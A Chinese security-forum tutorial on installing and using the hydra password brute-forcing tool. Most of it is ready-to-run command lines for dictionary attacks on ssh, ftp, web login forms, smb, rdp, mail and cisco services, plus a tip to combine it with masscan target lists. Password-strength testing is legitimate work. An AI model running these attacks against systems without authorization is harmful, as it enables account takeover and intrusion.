论坛 › 渗透攻防 › hydra-基于linux的密码暴力破解工具

banana 发表于 2019-4-30 09:53:09

hydra-基于linux的密码暴力破解工具

                   安装和使用http://p3.pstatp.com/large/pgc-image/02ff6d72e290439790e9aab17f608245
hail hydra！每个漫威粉都应该知道这个口号，它是漫威宇宙中最大的人类反派组织九头蛇的名片。如今hydra是行业有名的密码暴力破解工具。
（1）安装hydra
以centos7为例，安装完epel库后直接使用 yum install -y hydra 即可安装。
（2）使用hydra
# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service
例如：hydra -l root -P passwd.txt 192.168.1.1 -V -s 22 ssh -o show.txt
使用root加passwd.txt的密码词典爆破192.168.1.1 ssh的22号端口并显示破解信息并将破解的信息输出到show.txt文件里面。
（1）大写的L 可以指定用户词典。
（2）小写的p可以指定密码。
（3）大写的M可以指定目标IP库，一行一条，配合masscan扫描器使用简直神器。
（4）-f 在使用-M参数后，找到第一对登录名或者密码的时候终止破解。
（5）-t 同时运行的线程数，默认为16。
（6）-w 设置最大超时的时间，单位秒，默认是30s。
（7）-o 指定结果输出文件。
（8）-e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。
（9）大写的S 采用SSL连接。
（10）-R 继续从上一次进度接着破解。
使用方法：（1）破解ssh：
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
（2）破解ftp：
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
（3）get方式提交，破解web登录：
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
（4）post方式提交，破解web登录：
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 192.168.1.1 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
（参数说明：-t同时线程数3，-l用户名是admin，字典pass.txt，保存为out.txt，-f 当破解了一个密码就停止， 192.168.1.1目标ip，http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。）
（5）破解https：
hydra -m /index.php -l muts -P pass.txt 192.168.1.1 https
（6）破解teamspeak：
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
（7）破解cisco：
hydra -P pass.txt 192.168.1.254 cisco
hydra -m cloud -P pass.txt 192.168.1.254 cisco-enable
（8）破解smb：
hydra -l administrator -P pass.txt 192.168.1.1 smb
（9）破解pop3：
hydra -l muts -P pass.txt my.pop3.mail pop3
（10）破解rdp：
hydra ip rdp -l administrator -P pass.txt -V
（11）破解http-proxy：
hydra -l admin -P pass.txt http-proxy://192.168.1.1
（12）破解imap：
hydra -L user.txt -p secret 192.168.1.1 imap PLAIN
hydra -C defaults.txt -6 imap://:143/PLAIN
最后小结（1）这个工具仅供测试服务器系统的密码强度。
（2）账号密码词典需要自己编写或者去找安全大神要。
（3）它终究是一个工具，要想发挥其最大的作用，需要配和wireshark、nmap、masscan使用。
（4）附上windows版本的下载地址
https://github.com/maaaaz/thc-hydra-windows

               

查看完整版本: hydra-基于linux的密码暴力破解工具